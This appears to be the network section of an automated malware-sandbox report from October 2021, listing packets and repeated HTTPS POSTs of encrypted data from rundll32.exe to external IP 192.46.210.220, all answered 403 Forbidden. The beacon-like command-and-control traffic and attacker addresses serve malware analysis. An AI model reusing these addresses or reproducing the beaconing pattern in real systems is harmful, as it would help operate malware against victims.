                                                                                                      Oct 28, 2021 04:53:13.069785118 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:13.188700914 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.190440893 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.190599918 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:13.227521896 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.227900982 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.227993011 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:13.291230917 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:13.291433096 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:13.448807001 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.448889017 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.448900938 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.448956966 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.828486919 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.828519106 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:13.828696012 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:14.716006041 CEST49742808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:14.873809099 CEST80849742143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:14.959146976 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:15.119658947 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.120417118 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.120567083 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:15.121077061 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:15.121160984 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:15.141529083 CEST497466891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:15.282102108 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.282139063 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.282150030 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.282165051 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.282181025 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.308820009 CEST68914974645.77.0.96192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.308953047 CEST497466891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:15.309709072 CEST497466891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:15.474910021 CEST68914974645.77.0.96192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.476103067 CEST68914974645.77.0.96192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.476176023 CEST497466891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:15.665740967 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.665769100 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.665852070 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:15.665873051 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:15.668019056 CEST49745808192.168.2.3143.244.140.214
                                                                                                      Oct 28, 2021 04:53:15.784379005 CEST497476891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:15.828433990 CEST80849745143.244.140.214192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.861793995 CEST497466891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:15.949780941 CEST68914974745.77.0.96192.168.2.3
                                                                                                      Oct 28, 2021 04:53:15.949892998 CEST497476891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:15.950561047 CEST497476891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:16.027533054 CEST68914974645.77.0.96192.168.2.3
                                                                                                      Oct 28, 2021 04:53:16.027621984 CEST497466891192.168.2.345.77.0.96
                                                                                                      Oct 28, 2021 04:53:16.028268099 CEST497466891192.168.2.345.77.0.96

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 192.46.210.220

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.349741192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:09 UTC0OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:09 UTC0OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:10 UTC4INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.349743192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:11 UTC4OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:11 UTC5OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:12 UTC9INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:12 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.349782192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:33 UTC49OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:33 UTC49OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:34 UTC59INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:34 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.349783192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:33 UTC54OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:33 UTC54OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:34 UTC59INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:34 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.349790192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:37 UTC59OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:37 UTC59OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:38 UTC68INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.349791192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:37 UTC64OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:37 UTC64OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:38 UTC69INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:38 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.349798192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:41 UTC69OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:41 UTC69OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:41 UTC78INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:41 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.349799192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:41 UTC73OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:41 UTC74OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:42 UTC78INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:42 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.349807192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:45 UTC79OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:45 UTC79OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:45 UTC88INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:45 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.349809192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:45 UTC83OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:45 UTC83OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:46 UTC88INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.349818192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:50 UTC88OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:50 UTC89OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:51 UTC98INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:51 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.349819192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:50 UTC93OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
